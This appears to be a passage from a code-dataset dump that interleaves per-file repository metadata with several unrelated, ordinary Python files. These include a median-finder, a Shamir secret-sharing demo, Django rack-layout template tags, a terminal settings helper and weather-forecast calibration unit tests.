| 43.830769
| 108
| 0.67708
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,193
| 0.418743
|
2204368a20f00021e6e644e58818806aeac0f4fc
| 876
|
py
|
Python
|
295-find-median-from-data-stream/295-find-median-from-data-stream.py
|
Dawit-Getachew/A2SV_Practice
|
2fe06d725e0acfe668c6dae98fe3ef6e6e26ef61
|
[
"MIT"
] | null | null | null |
295-find-median-from-data-stream/295-find-median-from-data-stream.py
|
Dawit-Getachew/A2SV_Practice
|
2fe06d725e0acfe668c6dae98fe3ef6e6e26ef61
|
[
"MIT"
] | null | null | null |
295-find-median-from-data-stream/295-find-median-from-data-stream.py
|
Dawit-Getachew/A2SV_Practice
|
2fe06d725e0acfe668c6dae98fe3ef6e6e26ef61
|
[
"MIT"
] | null | null | null |
import heapq as h
class MedianFinder:
def __init__(self):
self.rightHalf = []
self.leftHalf = []
def addNum(self, num: int) -> None:
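        # leftHalf is a max-heap (values stored negated), rightHalf a min-heap;
        # each insert passes through one heap into the other so their sizes
        # never differ by more than one.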
        if len(self.leftHalf) > len(self.rightHalf):
            h.heappush(self.leftHalf, -num)
            h.heappush(self.rightHalf, -h.heappop(self.leftHalf))
        else:
            h.heappush(self.rightHalf, num)
            h.heappush(self.leftHalf, -h.heappop(self.rightHalf))
def findMedian(self) -> float:
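        # Equal sizes: the median is the mean of the two inner elements;
        # otherwise the extra (middle) element sits on top of leftHalf.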
        if len(self.leftHalf) == len(self.rightHalf):
            return (-self.leftHalf[0] + self.rightHalf[0]) / 2
        else:
            return -self.leftHalf[0]
# Your MedianFinder object will be instantiated and called as such:
# obj = MedianFinder()
# obj.addNum(num)
# param_2 = obj.findMedian()
| 31.285714
| 67
| 0.586758
| 718
| 0.819635
| 0
| 0
| 0
| 0
| 0
| 0
| 134
| 0.152968
|
2204946bef0686b31437d34ea53f7a86c1f9035c
| 1,781
|
py
|
Python
|
mottak-arkiv-service/tests/routers/mappers/test_metadatafil.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | 4
|
2021-03-05T15:39:24.000Z
|
2021-09-15T06:11:45.000Z
|
mottak-arkiv-service/tests/routers/mappers/test_metadatafil.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | 631
|
2020-04-27T10:39:18.000Z
|
2022-03-31T14:51:38.000Z
|
mottak-arkiv-service/tests/routers/mappers/test_metadatafil.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | 3
|
2020-02-20T15:48:03.000Z
|
2021-12-16T22:50:40.000Z
|
import pytest
from app.domain.models.Metadatafil import Metadatafil, MetadataType
from app.exceptions import InvalidContentType
from app.routers.mappers.metadafil import _get_file_content, metadatafil_mapper, _content_type2metadata_type
def test__content_type2metadata_type__success():
"""
GIVEN the string 'text/xml' as content_type
WHEN calling the method _content_type2metadata_type
THEN check that return value is MetadataType.XML_METS
"""
expected = MetadataType.XML_METS
actual = _content_type2metadata_type('text/xml')
assert actual == expected
def test__content_type2metadata_type__failure():
"""
GIVEN the string 'text' as content_type
WHEN calling the method _content_type2metadata_type
THEN check that a InvalidContentType Exception has been raised
"""
with pytest.raises(InvalidContentType):
_content_type2metadata_type('text')
def test__get_file_content(testfile, testfile_content):
"""
    GIVEN a file with test data where the content is a METS/XML file
WHEN calling the method _get_file_content
THEN check that the returned string is correct
"""
expected = testfile_content
actual = _get_file_content(testfile)
assert actual == expected
def test_metadatafil_mapper(testfile, testfile_content):
"""
    GIVEN a file with test data where the content is a METS/XML file
WHEN calling the method metadatafil_mapper
THEN check that the returned Metadatafil object is correct
"""
expected = Metadatafil(
filnavn="df53d1d8-39bf-4fea-a741-58d472664ce2.xml",
type_=MetadataType.XML_METS,
innhold=testfile_content)
actual = metadatafil_mapper(testfile)
assert vars(actual) == vars(expected)
| 34.25
| 108
| 0.742841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 808
| 0.453678
|
2204c4afb63d7b851791357727ac0902218aab44
| 2,748
|
py
|
Python
|
src/niweb/apps/noclook/templatetags/rack_tags.py
|
emjemj/ni
|
a78e6d97d1e4610aad7698c4f0f459221c680b4f
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
src/niweb/apps/noclook/templatetags/rack_tags.py
|
emjemj/ni
|
a78e6d97d1e4610aad7698c4f0f459221c680b4f
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2019-07-24T12:41:11.000Z
|
2020-03-31T10:10:04.000Z
|
src/niweb/apps/noclook/templatetags/rack_tags.py
|
emjemj/ni
|
a78e6d97d1e4610aad7698c4f0f459221c680b4f
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2019-02-25T14:58:20.000Z
|
2019-02-25T14:58:20.000Z
|
from django import template
register = template.Library()
RACK_SIZE_PX = 20
MARGIN_HEIGHT = 2
def _rack_unit_to_height(units):
# for every unit over 1 add a 2 px margin
margin = (units - 1) * MARGIN_HEIGHT
return units * RACK_SIZE_PX + margin
def _equipment_spacer(units):
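    # Blank filler entry occupying the given number of rack units.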
return {
'units': units,
'spacer': True,
'height': "{}px".format(_rack_unit_to_height(units)),
}
def _rack_sort(item):
    # Sort by rack position, then by unit size (larger items first)
pos = int(item.get('node').data.get('rack_position', -1))
size = int(item.get('node').data.get('rack_units', 0)) * -1
return (pos, size)
def _equipment(item):
data = item.get('node').data
units = int(data.get('rack_units', 1))
return {
'units': units,
'position': int(data.get('rack_position', 0) or 0),
'position_end': units + int(data.get('rack_position', 1)) - 1,
'height': "{}px".format(_rack_unit_to_height(units)),
'sub_equipment': [],
'is_back': data.get('rack_back'),
'data': data,
}
def place_equipment(view_data, current_idx, last_eq, result):
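    # Append a spacer for any vertical gap before this item; an item that
    # overlaps the previous one is nested under it as sub_equipment.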
spacing = view_data['position'] - current_idx
if spacing < 0:
# Equipment overlaps with previous
last_eq['sub_equipment'].append(view_data)
else:
if spacing > 0:
result.append(_equipment_spacer(spacing))
result.append(view_data)
new_idx = view_data['position'] + view_data['units']
return new_idx, view_data
return current_idx, last_eq
@register.inclusion_tag('noclook/tags/rack.html')
def noclook_rack(rack, equipment):
if equipment:
equipment.sort(key=_rack_sort)
racked_equipment = []
racked_equipment_back = []
unracked_equipment = []
# mem
front_idx = 1
front_last_eq = None
back_idx = 1
back_last_eq = None
for item in equipment:
view_data = _equipment(item)
is_rack_front = not view_data.get('is_back')
if view_data['position'] > 0:
if is_rack_front:
front_idx, front_last_eq = place_equipment(view_data, front_idx, front_last_eq, racked_equipment)
else:
back_idx, back_last_eq = place_equipment(view_data, back_idx, back_last_eq, racked_equipment_back)
else:
unracked_equipment.append(item)
return {
'rack_size': _rack_unit_to_height(rack.data.get('rack_units', 42)),
'racked_equipment': racked_equipment,
'racked_equipment_back': racked_equipment_back,
'unracked_equipment': unracked_equipment,
}
@register.filter
def rack_sort(equipment):
if equipment:
equipment.sort(key=_rack_sort, reverse=True)
return equipment
| 28.926316
| 114
| 0.643377
| 0
| 0
| 0
| 0
| 1,193
| 0.434134
| 0
| 0
| 497
| 0.180859
|
2205e64387c6f4c5a706049e6175c53d8453ff11
| 442
|
py
|
Python
|
Cryptography/Exp-1-Shamirs-Secret-Sharing/main.py
|
LuminolT/Cryptographic
|
87fffae591eee9644641a4c511972df0c2a44df7
|
[
"MIT"
] | null | null | null |
Cryptography/Exp-1-Shamirs-Secret-Sharing/main.py
|
LuminolT/Cryptographic
|
87fffae591eee9644641a4c511972df0c2a44df7
|
[
"MIT"
] | null | null | null |
Cryptography/Exp-1-Shamirs-Secret-Sharing/main.py
|
LuminolT/Cryptographic
|
87fffae591eee9644641a4c511972df0c2a44df7
|
[
"MIT"
] | 1
|
2022-03-07T13:56:55.000Z
|
2022-03-07T13:56:55.000Z
|
import numpy as np
import matplotlib.pyplot as plt
from shamir import *
from binascii import hexlify
# img = plt.imread('cat.png')
# plt.imshow(img)
# plt.show()
s = 'TEST_STRING'.encode()
print("Original secret:", hexlify(s))
l = Shamir.split(3, 5, s)  # split the secret printed above into 5 shares, any 3 recover it
for idx, item in l:
print("Share {}: {}".format(str(idx), hexlify(item)))
shares = l[1:4]
secret = Shamir.combine(shares)
print(f'Secret is: {secret.decode()}')
| 18.416667
| 57
| 0.669683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 142
| 0.321267
|
2206a89728beed4abfd89a30818175cab85e95be
| 825
|
py
|
Python
|
P20-Stack Abstract Data Type/Stack - Reverse Stack.py
|
necrospiritus/Python-Working-Examples
|
075d410673e470fc7c4ffc262e92109a3032132f
|
[
"MIT"
] | null | null | null |
P20-Stack Abstract Data Type/Stack - Reverse Stack.py
|
necrospiritus/Python-Working-Examples
|
075d410673e470fc7c4ffc262e92109a3032132f
|
[
"MIT"
] | null | null | null |
P20-Stack Abstract Data Type/Stack - Reverse Stack.py
|
necrospiritus/Python-Working-Examples
|
075d410673e470fc7c4ffc262e92109a3032132f
|
[
"MIT"
] | null | null | null |
"""Reverse stack is using a list where the top is at the beginning instead of at the end."""
class Reverse_Stack:
def __init__(self):
self.items = []
def is_empty(self): # test to see whether the stack is empty.
return self.items == []
    def push(self, item): # adds a new item to the top of the stack.
        self.items.insert(0, item)
    def pop(self): # removes the top item from the stack.
        return self.items.pop(0)
    def peek(self): # return the top item from the stack.
        return self.items[0]
def size(self): # returns the number of items on the stack.
return len(self.items)
s = Reverse_Stack()
print(s.is_empty())
s.push(4)
s.push("Dog")
print(s.peek())
s.push("Cat")
print(s.size())
print(s.is_empty())
s.pop()
print(s.peek())
print(s.size())
| 22.916667
| 92
| 0.632727
| 556
| 0.673939
| 0
| 0
| 0
| 0
| 0
| 0
| 306
| 0.370909
|
220737eae6a16eeacd5d110896be7e897b880d4e
| 101
|
py
|
Python
|
gerapy/cmd/server.py
|
awesome-archive/Gerapy
|
e9792d020397cd85b4d553b91b7829078b728b98
|
[
"MIT"
] | 1
|
2018-12-07T02:05:32.000Z
|
2018-12-07T02:05:32.000Z
|
gerapy/cmd/server.py
|
Tilyp/Gerapy
|
e9792d020397cd85b4d553b91b7829078b728b98
|
[
"MIT"
] | null | null | null |
gerapy/cmd/server.py
|
Tilyp/Gerapy
|
e9792d020397cd85b4d553b91b7829078b728b98
|
[
"MIT"
] | null | null | null |
from gerapy.server.manage import manage
import sys
def server():
# Call django cmd
manage()
| 14.428571
| 39
| 0.70297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 17
| 0.168317
|
220739480d36f76e621c523e3b7cf2bdd8e3c62a
| 964
|
py
|
Python
|
client/walt/client/term.py
|
dia38/walt-python-packages
|
e6fa1f166f45e73173195d57840d22bef87b88f5
|
[
"BSD-3-Clause"
] | 4
|
2020-01-14T09:12:56.000Z
|
2022-03-14T14:35:11.000Z
|
client/walt/client/term.py
|
dia38/walt-python-packages
|
e6fa1f166f45e73173195d57840d22bef87b88f5
|
[
"BSD-3-Clause"
] | 73
|
2016-04-29T13:17:26.000Z
|
2022-03-01T15:06:48.000Z
|
client/walt/client/term.py
|
dia38/walt-python-packages
|
e6fa1f166f45e73173195d57840d22bef87b88f5
|
[
"BSD-3-Clause"
] | 3
|
2019-03-18T14:27:56.000Z
|
2021-06-03T12:07:02.000Z
|
#!/usr/bin/env python
import sys, tty, termios, array, fcntl, curses
class TTYSettings(object):
def __init__(self):
self.tty_fd = sys.stdout.fileno()
# save
self.saved = termios.tcgetattr(self.tty_fd)
self.win_size = self.get_win_size()
self.rows, self.cols = self.win_size[0], self.win_size[1]
curses.setupterm()
self.num_colors = curses.tigetnum("colors")
def set_raw_no_echo(self):
# set raw mode
tty.setraw(self.tty_fd, termios.TCSADRAIN)
# disable echo
new = termios.tcgetattr(self.tty_fd)
new[3] &= ~termios.ECHO
termios.tcsetattr(self.tty_fd, termios.TCSADRAIN, new)
def restore(self):
# return saved conf
termios.tcsetattr(self.tty_fd, termios.TCSADRAIN, self.saved)
def get_win_size(self):
buf = array.array('h', [0, 0, 0, 0])
fcntl.ioctl(self.tty_fd, termios.TIOCGWINSZ, buf, True)
return buf
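# Minimal usage sketch (illustrative, not part of the original module):
# save the terminal state, switch to raw mode for interactive I/O, then
# restore it afterwards.
#
# tty_settings = TTYSettings()
# tty_settings.set_raw_no_echo()
# try:
#     pass  # read/write the raw terminal here
# finally:
#     tty_settings.restore()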
| 35.703704
| 69
| 0.629668
| 893
| 0.926349
| 0
| 0
| 0
| 0
| 0
| 0
| 85
| 0.088174
|
22075aae320e407eb3fd67de73b37aec7dd0a0b3
| 25,123
|
py
|
Python
|
improver_tests/calibration/ensemble_calibration/test_CalibratedForecastDistributionParameters.py
|
cpelley/improver
|
ebf77fe2adc85ed7aec74c26671872a2e4388ded
|
[
"BSD-3-Clause"
] | null | null | null |
improver_tests/calibration/ensemble_calibration/test_CalibratedForecastDistributionParameters.py
|
cpelley/improver
|
ebf77fe2adc85ed7aec74c26671872a2e4388ded
|
[
"BSD-3-Clause"
] | null | null | null |
improver_tests/calibration/ensemble_calibration/test_CalibratedForecastDistributionParameters.py
|
cpelley/improver
|
ebf77fe2adc85ed7aec74c26671872a2e4388ded
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2021 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Unit tests for the
`ensemble_calibration.CalibratedForecastDistributionParameters`
class.
"""
import unittest
import numpy as np
from iris.cube import CubeList
from iris.tests import IrisTest
from numpy.testing import assert_array_almost_equal
from improver.calibration.ensemble_calibration import (
CalibratedForecastDistributionParameters as Plugin,
)
from improver.calibration.ensemble_calibration import (
EstimateCoefficientsForEnsembleCalibration,
)
from improver.metadata.constants.attributes import MANDATORY_ATTRIBUTE_DEFAULTS
from improver.synthetic_data.set_up_test_cubes import set_up_variable_cube
from improver.utilities.warnings_handler import ManageWarnings
from .helper_functions import EnsembleCalibrationAssertions, SetupCubes
from .test_EstimateCoefficientsForEnsembleCalibration import SetupExpectedCoefficients
class SetupCoefficientsCubes(SetupCubes, SetupExpectedCoefficients):
"""Set up coefficients cubes for testing."""
@ManageWarnings(
ignored_messages=[
"Collapsing a non-contiguous coordinate.",
"invalid escape sequence",
],
warning_types=[UserWarning, DeprecationWarning],
)
def setUp(self):
"""Set up coefficients cubes for when either the ensemble mean or the
ensemble realizations have been used as the predictor. The coefficients
have been constructed from the same underlying set of ensemble
realizations, so application of these coefficients would be expected
to give similar results. The values for the coefficients used to
construct the coefficients cubes are taken from the
SetupExpectedCoefficients class. These coefficients are the
expected outputs from the tests to estimate the coefficients."""
super().setUp()
# Set up a coefficients cube when using the ensemble mean as the
# predictor.
estimator = EstimateCoefficientsForEnsembleCalibration(
"norm", desired_units="Celsius"
)
self.coeffs_from_mean = estimator.create_coefficients_cubelist(
self.expected_mean_pred_norm,
self.historic_temperature_forecast_cube,
CubeList([self.historic_temperature_forecast_cube]),
)
# Set up a timeshifted coefficients cube using the ensemble mean as a
# predictor.
forecast_timeshift_cube = self.historic_temperature_forecast_cube.copy()
for coord_name in ["time", "forecast_period"]:
forecast_timeshift_cube.coord(coord_name).points = [
_ + 3600 for _ in forecast_timeshift_cube.coord(coord_name).points
]
self.coeffs_from_mean_timeshift = estimator.create_coefficients_cubelist(
self.expected_mean_pred_norm,
forecast_timeshift_cube,
CubeList([forecast_timeshift_cube]),
)
# Set up a coefficients cube when using the ensemble mean as the
# predictor and separate coefficients at each point.
estimator = EstimateCoefficientsForEnsembleCalibration(
"norm", point_by_point=True, desired_units="Celsius"
)
point_by_point_predictor = np.stack(
[self.expected_mean_pred_norm] * 9
).T.reshape(4, 3, 3)
self.coeffs_from_mean_point_by_point = estimator.create_coefficients_cubelist(
point_by_point_predictor,
self.historic_temperature_forecast_cube,
CubeList([self.historic_temperature_forecast_cube]),
)
# Set up a coefficients cube when using the ensemble realization as the
# predictor.
estimator = EstimateCoefficientsForEnsembleCalibration(
"norm", desired_units="Celsius", predictor="realizations"
)
self.coeffs_from_realizations = estimator.create_coefficients_cubelist(
self.expected_realizations_norm,
self.historic_temperature_forecast_cube,
CubeList([self.historic_temperature_forecast_cube]),
)
# Set up a coefficients cube when using the ensemble realization as the
# predictor and separate coefficients at each point.
expected_realizations_each_site = [
array if array.ndim == 1 else np.squeeze(array)
for array in list(self.expected_realizations_each_site.values())
]
estimator = EstimateCoefficientsForEnsembleCalibration(
"norm", predictor="realizations", point_by_point=True
)
self.coeffs_from_realizations_sites = estimator.create_coefficients_cubelist(
expected_realizations_each_site,
self.historic_forecast_spot_cube,
CubeList([self.historic_temperature_forecast_cube]),
)
        # Set up a coefficients cube when using an additional predictor.
self.altitude = set_up_variable_cube(
np.ones((3, 3), dtype=np.float32), name="surface_altitude", units="m"
)
for coord in ["time", "forecast_reference_time", "forecast_period"]:
self.altitude.remove_coord(coord)
estimator = EstimateCoefficientsForEnsembleCalibration(
"norm", desired_units="Celsius"
)
self.coeffs_from_mean_alt = estimator.create_coefficients_cubelist(
self.expected_mean_pred_norm_alt,
self.historic_temperature_forecast_cube,
CubeList([self.historic_temperature_forecast_cube, self.altitude]),
)
# Some expected data that are used in various tests.
self.expected_loc_param_mean = np.array(
[
[273.7014, 274.6534, 275.4469],
[276.9385, 277.7636, 278.5570],
[279.6996, 280.1122, 281.2547],
],
dtype=np.float32,
)
self.expected_scale_param_mean = np.array(
[
[0.2316, 0.2342, 0.0168],
[0.0271, 0.0237, 0.0168],
[0.0634, 0.1151, 0.0116],
],
dtype=np.float32,
)
self.expected_loc_param_realizations = np.array(
[
[274.388, 275.3053, 275.4492],
[277.1295, 277.3866, 278.4672],
[280.2007, 280.3929, 281.2602],
],
dtype=np.float32,
)
self.expected_loc_param_realizations_sites = np.array(
[277.7531, 277.4529, 277.553, 277.2528], dtype=np.float32,
)
self.expected_scale_param_realizations_sites = np.array(
[0, 0, 0, 0], dtype=np.float32
)
self.expected_loc_param_mean_alt = np.array(
[
[275.18134, 276.18134, 277.01465],
[278.58133, 279.44797, 280.2813],
[281.48132, 281.91464, 283.11465],
],
dtype=np.float32,
)
self.expected_scale_param_mean_alt = np.array(
[
[0.4347, 0.4396, 0.0308],
[0.0503, 0.0438, 0.0308],
[0.1184, 0.2157, 0.0211],
],
dtype=np.float32,
)
# Create output cubes with the expected data.
self.expected_loc_param_mean_cube = set_up_variable_cube(
self.expected_loc_param_mean,
name="location_parameter",
units="K",
attributes=MANDATORY_ATTRIBUTE_DEFAULTS,
)
self.expected_scale_param_mean_cube = set_up_variable_cube(
self.expected_scale_param_mean,
name="scale_parameter",
units="Kelvin^2",
attributes=MANDATORY_ATTRIBUTE_DEFAULTS,
)
class Test__init__(IrisTest):
"""Test the __init__ method."""
def test_basic(self):
"""Test without specifying a predictor."""
plugin = Plugin()
self.assertEqual(plugin.predictor, "mean")
def test_with_predictor(self):
"""Test specifying the predictor."""
plugin = Plugin(predictor="realizations")
self.assertEqual(plugin.predictor, "realizations")
class Test__repr__(IrisTest):
"""Test the __repr__ method."""
def test_basic(self):
"""Test without the predictor."""
result = str(Plugin())
msg = "<CalibratedForecastDistributionParameters: " "predictor: mean>"
self.assertEqual(result, msg)
def test_with_predictor(self):
"""Test specifying the predictor."""
result = str(Plugin(predictor="realizations"))
msg = "<CalibratedForecastDistributionParameters: " "predictor: realizations>"
self.assertEqual(result, msg)
class Test__spatial_domain_match(SetupCoefficientsCubes):
""" Test the _spatial_domain_match method."""
def setUp(self):
super().setUp()
self.plugin = Plugin()
def test_matching(self):
"""Test case in which spatial domains match."""
self.plugin.current_forecast = self.current_temperature_forecast_cube
self.plugin.coefficients_cubelist = self.coeffs_from_mean
self.plugin._spatial_domain_match()
def test_unmatching_x_axis_points(self):
"""Test when the points of the x dimension do not match."""
self.current_temperature_forecast_cube.coord(axis="x").bounds = (
self.current_temperature_forecast_cube.coord(axis="x").bounds + 2.0
)
self.plugin.current_forecast = self.current_temperature_forecast_cube
self.plugin.coefficients_cubelist = self.coeffs_from_mean
msg = "The points or bounds of the x axis given by the current forecast"
with self.assertRaisesRegex(ValueError, msg):
self.plugin._spatial_domain_match()
def test_unmatching_x_axis_bounds(self):
"""Test when the bounds of the x dimension do not match."""
self.current_temperature_forecast_cube.coord(axis="x").bounds = [
[-35, -5],
[-5, 5],
[5, 35],
]
self.plugin.current_forecast = self.current_temperature_forecast_cube
self.plugin.coefficients_cubelist = self.coeffs_from_mean
msg = "The points or bounds of the x axis given by the current forecast"
with self.assertRaisesRegex(ValueError, msg):
self.plugin._spatial_domain_match()
def test_unmatching_y_axis(self):
"""Test case in which the y-dimensions of the domains do not match."""
self.current_temperature_forecast_cube.coord(axis="y").bounds = (
self.current_temperature_forecast_cube.coord(axis="y").bounds + 2.0
)
self.plugin.current_forecast = self.current_temperature_forecast_cube
self.plugin.coefficients_cubelist = self.coeffs_from_mean
msg = "The points or bounds of the y axis given by the current forecast"
with self.assertRaisesRegex(ValueError, msg):
self.plugin._spatial_domain_match()
def test_skipping_spot_forecast(self):
"""Test passing a spot forecast. In this case, the spatial domain
is not checked."""
self.plugin.current_forecast = self.current_forecast_spot_cube
self.plugin._spatial_domain_match()
class Test__calculate_location_parameter_from_mean(
SetupCoefficientsCubes, EnsembleCalibrationAssertions
):
"""Test the __calculate_location_parameter_from_mean method."""
def setUp(self):
"""Set-up coefficients and plugin for testing."""
super().setUp()
self.plugin = Plugin()
self.plugin.current_forecast = self.current_temperature_forecast_cube
self.plugin.coefficients_cubelist = self.coeffs_from_mean
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_basic(self):
"""Test that the expected values for the location parameter are
calculated when using the ensemble mean. These expected values are
compared to the results when using the ensemble realizations to ensure
that the results are similar."""
location_parameter = self.plugin._calculate_location_parameter_from_mean()
self.assertCalibratedVariablesAlmostEqual(
location_parameter, self.expected_loc_param_mean
)
assert_array_almost_equal(
location_parameter, self.expected_loc_param_realizations, decimal=0,
)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_missing_additional_predictor(self):
"""Test that an error is raised if an additional predictor is expected
based on the contents of the coefficients cube."""
self.plugin.coefficients_cubelist = self.coeffs_from_mean_alt
msg = "The number of forecast predictors must equal the number"
with self.assertRaisesRegex(ValueError, msg):
self.plugin._calculate_location_parameter_from_mean()
class Test__calculate_location_parameter_from_realizations(
SetupCoefficientsCubes, EnsembleCalibrationAssertions
):
"""Test the _calculate_location_parameter_from_realizations method."""
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def setUp(self):
"""Set-up coefficients and plugin for testing."""
super().setUp()
self.plugin = Plugin()
self.plugin.current_forecast = self.current_temperature_forecast_cube
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_basic(self):
"""Test that the expected values for the location parameter are
calculated when using the ensemble realizations. These expected values
are compared to the results when using the ensemble mean to ensure
that the results are similar."""
self.plugin.coefficients_cubelist = self.coeffs_from_realizations
location_parameter = (
self.plugin._calculate_location_parameter_from_realizations()
)
self.assertCalibratedVariablesAlmostEqual(
location_parameter, self.expected_loc_param_realizations
)
assert_array_almost_equal(
location_parameter, self.expected_loc_param_mean, decimal=0
)
class Test__calculate_scale_parameter(
SetupCoefficientsCubes, EnsembleCalibrationAssertions
):
"""Test the _calculate_scale_parameter method."""
def setUp(self):
"""Set-up the plugin for testing."""
super().setUp()
self.plugin = Plugin()
self.plugin.current_forecast = self.current_temperature_forecast_cube
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_basic(self):
"""Test the scale parameter is calculated correctly."""
self.plugin.coefficients_cubelist = self.coeffs_from_mean
scale_parameter = self.plugin._calculate_scale_parameter()
self.assertCalibratedVariablesAlmostEqual(
scale_parameter, self.expected_scale_param_mean
)
class Test__create_output_cubes(SetupCoefficientsCubes, EnsembleCalibrationAssertions):
"""Test the _create_output_cubes method."""
def setUp(self):
"""Set-up the plugin for testing."""
super().setUp()
self.plugin = Plugin()
self.plugin.current_forecast = self.current_temperature_forecast_cube
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_basic(self):
"""Test that the cubes created containing the location and scale
parameter are formatted as expected."""
(
location_parameter_cube,
scale_parameter_cube,
) = self.plugin._create_output_cubes(
self.expected_loc_param_mean, self.expected_scale_param_mean
)
self.assertEqual(location_parameter_cube, self.expected_loc_param_mean_cube)
self.assertEqual(scale_parameter_cube, self.expected_scale_param_mean_cube)
class Test_process(SetupCoefficientsCubes, EnsembleCalibrationAssertions):
"""Test the process plugin."""
def setUp(self):
"""Set-up the plugin for testing."""
super().setUp()
self.plugin = Plugin()
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_diagnostic_match(self):
"""Test that an error is raised if the diagnostic_standard_name does
not match when comparing a forecast cube and coefficients cubelist."""
msg = "The forecast diagnostic"
with self.assertRaisesRegex(ValueError, msg):
self.plugin.process(
self.current_wind_speed_forecast_cube, self.coeffs_from_mean
)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_time_match(self):
"""Test that an error is raised if the time coordinates do
not match when comparing a forecast cube and coefficients cubelist."""
msg = "rounded forecast_period hours"
with self.assertRaisesRegex(ValueError, msg):
self.plugin.process(
self.current_temperature_forecast_cube, self.coeffs_from_mean_timeshift
)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_time_match_tolerate(self):
"""Test that no error is raised when using a coefficients file with
a mismatching forecast_period coordinate, if the
tolerate_time_mismatch option is enabled."""
calibrated_forecast_predictor, calibrated_forecast_var = self.plugin.process(
self.current_temperature_forecast_cube,
self.coeffs_from_mean_timeshift,
tolerate_time_mismatch=True,
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data, self.expected_loc_param_mean
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data, self.expected_scale_param_mean
)
self.assertEqual(calibrated_forecast_predictor.dtype, np.float32)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_variable_setting(self):
"""Test that the cubes passed into the plugin are allocated to
plugin variables appropriately."""
_, _ = self.plugin.process(
self.current_temperature_forecast_cube, self.coeffs_from_mean
)
self.assertEqual(
self.current_temperature_forecast_cube, self.plugin.current_forecast
)
self.assertEqual(self.coeffs_from_mean, self.plugin.coefficients_cubelist)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_end_to_end(self):
"""An example end-to-end calculation. This repeats the test elements
above but all grouped together."""
calibrated_forecast_predictor, calibrated_forecast_var = self.plugin.process(
self.current_temperature_forecast_cube, self.coeffs_from_mean
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data, self.expected_loc_param_mean
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data, self.expected_scale_param_mean
)
self.assertEqual(calibrated_forecast_predictor.dtype, np.float32)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_end_to_end_point_by_point(self):
"""An example end-to-end calculation when a separate set of
coefficients are computed for each grid point. This repeats the test
elements above but all grouped together."""
calibrated_forecast_predictor, calibrated_forecast_var = self.plugin.process(
self.current_temperature_forecast_cube, self.coeffs_from_mean_point_by_point
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data, self.expected_loc_param_mean
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data, self.expected_scale_param_mean
)
self.assertEqual(calibrated_forecast_predictor.dtype, np.float32)
@ManageWarnings(ignored_messages=["Collapsing a non-contiguous coordinate."])
def test_end_to_end_point_by_point_sites_realizations(self):
"""An example end-to-end calculation when a separate set of
coefficients are computed for each site using the realizations as the
predictor. This repeats the test elements above but all grouped together."""
plugin = Plugin(predictor="realizations")
calibrated_forecast_predictor, calibrated_forecast_var = plugin.process(
self.current_forecast_spot_cube, self.coeffs_from_realizations_sites
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_predictor.data,
self.expected_loc_param_realizations_sites,
)
self.assertCalibratedVariablesAlmostEqual(
calibrated_forecast_var.data, self.expected_scale_param_realizations_sites
)
self.assertEqual(calibrated_forecast_predictor.dtype, np.float32)
